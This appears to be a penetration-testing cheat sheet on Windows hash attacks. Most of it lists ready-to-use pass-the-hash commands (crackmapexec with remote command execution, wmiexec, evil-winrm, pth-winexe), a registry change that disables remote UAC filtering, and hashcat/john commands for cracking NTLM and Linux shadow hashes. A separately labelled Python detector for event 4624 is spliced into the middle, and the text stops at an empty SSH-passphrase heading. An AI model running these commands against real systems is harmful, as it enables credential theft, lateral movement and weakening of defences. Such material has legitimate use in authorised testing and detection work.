Hash attacks

Obtaining hashes from the SAM database or from LSASS memory: mimikatz

How pass-the-hash attacks work and how they are used: PTH, Impacket

Other examples of use:

pth-winexe -U <user>%<LM>:<NTLM> //<IP> cmd
exploit/windows/smb/psexec
crackmapexec smb -u administrator -H <NTLM> --local-auth <IP>
crackmapexec smb -u administrator -H <NTLM> -d . <IP>
crackmapexec smb -u administrator -H <NTLM> -x 'whoami' <IP>
impacket-wmiexec administrator@<IP> -hashes <LM>:<NTLM>
evil-winrm -i <IP> -u user -H <NTLM>
smbclient //<IP>/c$ -U <user> --pw-nt-hash <NTLM> -W <domain>  # SMB service
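From the defender's side, the commands above leave recognisable traces in Windows Security event 4624. The following is an added example, not code from the original page: it classifies constructed 4624 records (field names mirror the event data; the function and class names are my own) by those traces.

```python
# Added example, not code from the original page: classify Windows Security
# event 4624 records by the traces the pass-the-hash commands above leave.
# The events are constructed samples; field names mirror the 4624 event data.
from dataclasses import dataclass

@dataclass
class Logon4624:
    computer: str       # host that logged the event
    target_user: str
    target_domain: str
    logon_type: int
    logon_process: str
    auth_package: str
    key_length: int

def pth_indicators(ev: Logon4624) -> list[str]:
    """Return the reasons an event resembles pass-the-hash (empty if none)."""
    reasons = []
    if (ev.logon_type == 3 and ev.auth_package == "NTLM"
            and ev.logon_process == "NtLmSsp"):
        # A local account (TargetDomainName equals the host itself) used over
        # the network is exactly what `--local-auth` / `-d .` produce.
        if ev.target_domain.upper() == ev.computer.upper():
            reasons.append("local account NTLM logon over the network")
        # PTH tooling commonly yields KeyLength 0; Windows clients report 128.
        if ev.key_length == 0:
            reasons.append("NTLM network logon with KeyLength 0")
    # sekurlsa::pth on the operator's own host: type 9 (NewCredentials) via
    # seclogo. runas /netonly leaves the same trace, so it is a lead, not proof.
    if ev.logon_type == 9 and ev.logon_process.lower() == "seclogo":
        reasons.append("NewCredentials logon via seclogo")
    return reasons

def scan(events: list[Logon4624]) -> dict[str, list[str]]:
    """Map 'DOMAIN\\user@computer' to its indicators for each flagged event."""
    hits = {}
    for ev in events:
        if reasons := pth_indicators(ev):
            hits[f"{ev.target_domain}\\{ev.target_user}@{ev.computer}"] = reasons
    return hits

SAMPLE_EVENTS = [  # constructed, not captured from a real host
    Logon4624("FS01", "alice", "CORP", 3, "Kerberos", "Kerberos", 128),
    Logon4624("FS01", "administrator", "FS01", 3, "NtLmSsp", "NTLM", 0),
    Logon4624("WS07", "bob", "CORP", 9, "seclogo", "Negotiate", 0),
]

for key, why in scan(SAMPLE_EVENTS).items():
    print(key, "->", "; ".join(why))
```

The Kerberos logon is not flagged, the local-account NTLM logon gets two reasons, and the type 9 seclogo logon is reported as a lead to correlate with other evidence.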

Remote UAC returns the error rpc_s_access_denied; the following registry value turns that filtering off:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Cracking NTLM hashes:

hashcat -m 1000 <hash.txt> <pass.txt> --force
john --wordlist=<pass.txt> <hash.txt> --format=NT

Cracking Linux passwords:

unshadow passwd.txt shadows.txt > unshadowed.txt    # merge the two files
john --wordlist=<pass.txt> unshadowed.txt

Cracking the passphrase protecting an SSH private key
